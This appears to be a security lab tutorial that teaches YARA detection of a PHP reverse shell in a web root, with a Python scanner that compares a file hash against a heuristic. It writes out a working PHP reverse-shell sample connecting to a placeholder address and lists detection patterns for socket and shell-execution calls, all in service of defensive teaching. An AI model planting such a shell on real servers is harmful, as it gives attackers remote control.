For this lab, you'll need an Ubuntu machine and a separate Kali Linux machine.
- The machine from labs 1 and 2 is required; YARA must be installed and working on it.
Key Sec+ Term: Indicators of Compromise
Indicators of Compromise (IoCs): IoCs are artifacts observed on a system or network that can be used to identify potentially malicious activity. Examples of IoCs include specific file hashes, IP addresses, domain names, URLs, and specific strings or byte patterns found in files or traffic.
YARA's Capability:
- YARA is a versatile tool that lets researchers and security professionals write rules that match on textual or binary patterns in files (or memory). This means YARA rules can be written to match on specific IoCs, such as a particular file hash or a specific string known to appear in a piece of malware.
Beyond IoCs:
- While YARA can match on IoCs, its capabilities extend beyond simple indicator matching. Rules can describe more abstract characteristics of malware or other threats: a combination of strings or API names, a file structure, or a set of traits that are typical of a malware family or technique, even when none of them is a specific, known IoC. This makes YARA useful for both (Key Sec+ Term) signature-based detection (matching known IoCs) and (Key Sec+ Term) heuristic or behavior-based detection (flagging a file because of the patterns or characteristics it exhibits).
- The trade-off is the usual one: hash and exact-string rules rarely produce false positives but miss anything slightly modified, while heuristic rules catch variants but can also fire on benign files that happen to share a trait.
- Keep in mind that the rule sets we will download are open source and community maintained. Many may not have been updated for some time, so expect both misses and the occasional false positive.

In this lab, we’ll do the following:
- Create a PHP page that contains reverse shell code.
- Create a second web page that isn't malicious at all.
- Download a large set of YARA rules.
- Run every rule in the set against the folder containing our web pages and see what is detected (and whether the benign page triggers anything).
- Note: What we are about to do should definitely be added to your list of CyberPatriot techniques.
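To make the signature-versus-heuristic distinction from the Sec+ notes concrete before we run a real rule set, here is an added example in Python. It is not part of the lab and not code from any published YARA rule set. It builds a throwaway web root with the two pages the lab plan describes (a benign page and a PHP reverse shell; the file contents, the `10.0.0.5:4444` address and the "known-bad" hash are all constructed for the example), then scans it two ways: by file hash (a pure IoC match) and by a heuristic that looks for a network primitive combined with a process primitive. It also prints the same heuristic written as a YARA rule, which I wrote for this example; the rule name and strings are my own choices, not from any feed.

```python
"""Added example: a minimal IoC + heuristic scanner over a web root.

Not part of the lab and not a published YARA rule. All sample data below
is constructed: the two pages, the reverse-shell target address, and the
'known-bad' hash (which is simply the hash of our own sample).
"""
import hashlib
import os
import re
import tempfile

# Constructed benign page: plain HTML with a harmless PHP tag.
BENIGN_PAGE = b"""<html><body><h1>Hello from the lab box</h1>
<?php echo date('Y-m-d'); ?></body></html>
"""

# Constructed PHP reverse shell: opens a socket and hands it to /bin/sh.
# The address is a placeholder, not a real listener.
REVERSE_SHELL_PAGE = b"""<?php
$sock = fsockopen("10.0.0.5", 4444);
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>
"""

# Signature-based detection: a set of known-bad SHA-256 hashes. A real IoC
# feed would ship these; here we seed it with the hash of our own sample.
KNOWN_BAD_SHA256 = {hashlib.sha256(REVERSE_SHELL_PAGE).hexdigest()}

# Heuristic detection: traits a PHP reverse shell needs regardless of which
# sample it came from. Requiring a network primitive AND a process primitive
# (or an interactive-shell string) keeps ordinary PHP pages from matching.
NETWORK_PRIMITIVES = re.compile(rb"\b(fsockopen|socket_create|stream_socket_client)\s*\(")
EXEC_PRIMITIVES = re.compile(rb"\b(proc_open|popen|exec|shell_exec|passthru|system)\s*\(")
SHELL_STRINGS = re.compile(rb"/bin/(ba)?sh\s+-i")


def heuristic_matches(data):
    """True when the bytes look like a socket-to-shell reverse shell."""
    if not NETWORK_PRIMITIVES.search(data):
        return False
    return bool(EXEC_PRIMITIVES.search(data) or SHELL_STRINGS.search(data))


def scan_file(path):
    """Return detections for one file: 'hash' for a known IoC, 'heuristic'
    for the reverse-shell trait combination, [] when nothing fires."""
    with open(path, "rb") as fh:
        data = fh.read()
    hits = []
    if hashlib.sha256(data).hexdigest() in KNOWN_BAD_SHA256:
        hits.append("hash")
    if heuristic_matches(data):
        hits.append("heuristic")
    return hits


def scan_directory(root):
    """Walk the web root (like `yara -r`) and map each file to its hits."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            results[os.path.relpath(path, root)] = scan_file(path)
    return results


def yara_rule_text():
    """The same heuristic as a YARA rule (written for this example)."""
    return r"""rule php_reverse_shell_heuristic
{
    meta:
        description = "PHP that opens a socket and hands it to a shell"
    strings:
        $net1 = "fsockopen(" ascii
        $net2 = "socket_create(" ascii
        $net3 = "stream_socket_client(" ascii
        $exec1 = "proc_open(" ascii
        $exec2 = "popen(" ascii
        $exec3 = "shell_exec(" ascii
        $sh = /\/bin\/(ba)?sh\s+-i/
    condition:
        any of ($net*) and (any of ($exec*) or $sh)
}
"""


def build_lab_webroot():
    """Create a throwaway web root holding both pages; return its path."""
    root = tempfile.mkdtemp(prefix="lab3-webroot-")
    with open(os.path.join(root, "index.html"), "wb") as fh:
        fh.write(BENIGN_PAGE)
    with open(os.path.join(root, "shell.php"), "wb") as fh:
        fh.write(REVERSE_SHELL_PAGE)
    return root


if __name__ == "__main__":
    webroot = build_lab_webroot()
    for rel, hits in sorted(scan_directory(webroot).items()):
        print(f"{rel}: {'CLEAN' if not hits else ', '.join(hits)}")
    print(yara_rule_text())
```

Two things to notice when you run it. The benign page is clean under both checks, while `shell.php` fires on the hash and on the heuristic. Change one byte of the reverse shell and the hash match disappears but the heuristic still fires, which is exactly why the downloaded rule sets lean on patterns rather than hashes. The heuristic is also deliberately narrow: a command-execution webshell such as `system($_GET['c'])` never opens a socket, so this rule stays silent on it, and a rule set covers that shape with separate rules. If you save the printed rule to a file, `yara -r` against the folder runs it the same way the lab does with the full set.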
Install Apache2 on your Ubuntu machine.